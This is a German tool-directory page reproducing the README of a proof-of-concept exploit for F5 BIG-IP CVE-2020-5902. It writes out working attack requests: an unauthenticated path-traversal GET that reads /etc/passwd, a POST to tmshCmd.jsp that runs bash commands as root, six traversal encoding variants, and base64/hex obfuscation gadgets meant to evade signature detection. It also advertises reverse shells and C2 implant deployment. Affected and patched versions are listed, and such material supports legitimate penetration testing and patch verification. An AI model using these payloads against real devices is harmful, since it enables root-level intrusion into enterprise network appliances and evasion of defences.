Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
F5-BIG-IP — F5 BIG-IP ist eine Plattform für Anwendungsbereitstellung und -sicherheit, die in Unternehmensumgebungen weit verbreitet ist. Die CVE-2020-5902 ist eine kritische Schwachstelle im TMUI, die in nicht gepatchten Versionen unbefugten Zugriff und Remote-Code-Ausführung ermöglichen kann, was die Notwendigkeit von Aktualisierungen und kontinuierlichem Schwachstellenmanagement unterstreicht. | Kitploit
Tools/GitHubGitHub/devrafaelprogrammer/f5-big-ip
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed TeamingPayload-Entwicklung
GitHub
devrafaelprogrammer/f5-big-ip

F5-BIG-IP

Repository anzeigen
9vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

F5 BIG-IP ist eine Plattform für Anwendungsbereitstellung und -sicherheit, die in Unternehmensumgebungen weit verbreitet ist. Die CVE-2020-5902 ist eine kritische Schwachstelle im TMUI, die in nicht gepatchten Versionen unbefugten Zugriff und Remote-Code-Ausführung ermöglichen kann, was die Notwendigkeit von Aktualisierungen und kontinuierlichem Schwachstellenmanagement unterstreicht.

Teilen

CVE-2020-5902 — F5 BIG-IP TMUI RCE

Proof-of-Concept-Exploit für die kritische Path-Traversal-/Remote-Codeausführungs-Schwachstelle in F5 BIG-IPs Traffic Management User Interface (TMUI).

⚠️ Nur für autorisierte Penetrationstests und Sicherheitsforschung. Der unbefugte Einsatz gegen Systeme, die einem nicht gehören oder für die keine schriftliche Genehmigung zum Testen vorliegt, ist illegal. Der Autor übernimmt keine Haftung für den Missbrauch dieses Tools.


Inhaltsverzeichnis

  • Hintergrund
  • Schwachstellenanalyse
  • Technische Tiefenanalyse
  • Betroffene Versionen
  • Funktionen
  • Installation
  • Verwendung
  • Abwehrmaßnahmen
  • Erkennung & Bedrohungssuche
  • Zeitplan
  • Referenzen
  • Haftungsausschluss

Hintergrund

F5 BIG-IP ist eine Familie vielseitiger Netzwerkgeräte (Load Balancer, WAFs, Application Delivery Controller), die weltweit in der Mehrheit der Fortune-500-Unternehmen, Finanzinstitute, Gesundheitsorganisationen und Regierungsbehörden eingesetzt wird. Das Traffic Management User Interface (TMUI) — auch als Konfigurationsprogramm bezeichnet — ist das webbasierte Verwaltungsportal, das über Port 443 (oder 8443) erreichbar ist.

Im Juli 2020 legte F5 CVE-2020-5902 offen, eine kritische (CVSS 9.8) Path-Traversal-Schwachstelle ohne Authentifizierung im TMUI, die es einem entfernten, nicht authentifizierten Angreifer ermöglicht:

  • Beliebige Dateien vom zugrunde liegenden Linux-System zu lesen (LFI)
  • Beliebige Betriebssystembefehle als root auszuführen (RCE)
  • Das Gerät vollständig zu kompromittieren und in interne Netzwerke zu pivotieren

Innerhalb von Tagen nach der öffentlichen Offenlegung wurde eine massenhafte Ausnutzung in freier Wildbahn beobachtet, unter anderem durch staatlich geförderte Akteure.


Schwachstellenanalyse

Grundursache

Das TMUI basiert auf Apache Tomcat und verwendet einen Servlet-Filter, um die Authentifizierung für geschützte Ressourcen durchzusetzen. Die Schwachstelle liegt in der Art und Weise, wie Tomcat durch Semikolon getrennte Pfadsegmente (;) parst.

Die folgende Anfrage umgeht die Authentifizierung vollständig:

GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Warum es funktioniert:

  1. Der Tomcat-Servlet-Filter sieht den Pfad als /tmui/login.jsp (endet vor ;) — also die öffentliche Anmeldeseite — und erlaubt die Anfrage.
  2. Der URL-Resolver von Tomcat verarbeitet dann /..;/ als Path Traversal (/../), bevor die Weiterleitung erfolgt.
  3. Die Anfrage wird letztendlich ohne Authentifizierung an das geschützte fileRead.jsp-Servlet weitergeleitet.
┌──────────────────────────────────────────────────────────────────┐
│  Client Request                                                   │
│  GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp     │
└────────────────────────────┬─────────────────────────────────────┘
                             │
             ┌───────────────▼───────────────┐
             │    Tomcat Servlet Filter       │
             │  Sees: /tmui/login.jsp  ✓     │
             │  (public endpoint → ALLOW)    │
             └───────────────┬───────────────┘
                             │
             ┌───────────────▼───────────────┐
             │    Tomcat URL Resolver         │
             │  Resolves: /..;/ → /../       │
             │  Final path: /tmui/locallb/   │
             │  workspace/fileRead.jsp ← 🔓  │
             └───────────────┬───────────────┘
                             │
             ┌───────────────▼───────────────┐
             │  fileRead.jsp (no auth check) │
             │  Reads arbitrary files as root│
             └───────────────────────────────┘

Von LFI zu RCE

Das tmshCmd.jsp-Servlet (ebenfalls über denselben Traversal erreichbar) übergibt die Parameter command und utilCmdArgs direkt an tmsh (die BIG-IP-Verwaltungsshell), die run util bash -c '...' kapselt. Dies ermöglicht eine Befehlsausführung im Betriebssystem mit Root-Rechten ohne Authentifizierung:

POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp
command=run+util+bash+-c+'id'&utilCmdArgs=-c+'id'

Technische Tiefenanalyse

Angriffsablauf

Phase 1: Reconnaissance
  └─ TCP banner grab (HTTP/TLS fingerprint)
  └─ SSL certificate analysis
  └─ HTTP headers fingerprint (Server, X-Powered-By, Set-Cookie)
  └─ BIG-IP version estimation from /etc/f5-release

Phase 2: Vulnerability Check
  └─ Iterate over 6 traversal encoding variants
  └─ Test against 4 known-readable sentinel files
  └─ Confirm output matches known indicators (root:x:0:0, BIG-IP, etc.)

Phase 3: Exploitation
  ├─ Vector A: tmshCmd.jsp (primary RCE)
  │    └─ Command obfuscated via base64 / hex-encode gadgets
  ├─ Vector B: fileRead.jsp + command injection in fileName param
  │    └─ OS command injected into the fileName parameter
  └─ Vector C: Log poisoning (User-Agent injection → read access_log)

Phase 4: Post-Exploitation (optional)
  ├─ Interactive shell (command REPL)
  ├─ Reverse shell (4 concurrent one-liners)
  ├─ LFI brute-force (30 sensitive paths, parallel)
  └─ C2 implant deployment (Sliver / Metasploit / custom)

Traversal-Codierungsvarianten

VariantePayload
Standardtmui/login.jsp/..;/tmui/...
Codiertes Semikolontmui/login.jsp/..%3b/tmui/...
Doppelte URL-Codierungtmui%2flogin.jsp%2f..%3b%2ftmui%2f...
Unicode-Punkt-Punkttmui/login.jsp/%2e%2e;/tmui/...
Groß-/KleinschreibungsvarianteTMUI/login.jsp/..;/tmui/...
Verzeichnis-Verwechslungtmui/login.jsp/..;/tmui/locallb/workspace/../workspace/...

Befehlsverschleierungs-Gadgets

Das Tool wendet pro Ausführung eines von zwei Verschleierungs-Gadgets an, was die Erkennung durch statische Signaturen erschwert:

# Gadget 1 — Base64 encode/decode pipeline
bash -c {echo,aWQ=}|{base64,-d}|bash

# Gadget 2 — Hex-byte printf evaluation
eval "$(printf '\x69\x64')"

Betroffene Versionen

BIG-IP-ZweigVerwundbarer BereichGepatchte Version
15.x< 15.1.0.4≥ 15.1.0.4
14.x< 14.1.2.6≥ 14.1.2.6
13.x< 13.1.3.4≥ 13.1.3.4
12.x< 12.1.5.2≥ 12.1.5.2
11.x< 11.6.5.2≥ 11.6.5.2

BIG-IQ, BIG-IQ Centralized Management, F5OS und Traffix SDC sind von dieser spezifischen CVE nicht betroffen.


Funktionen

Tool herunterladen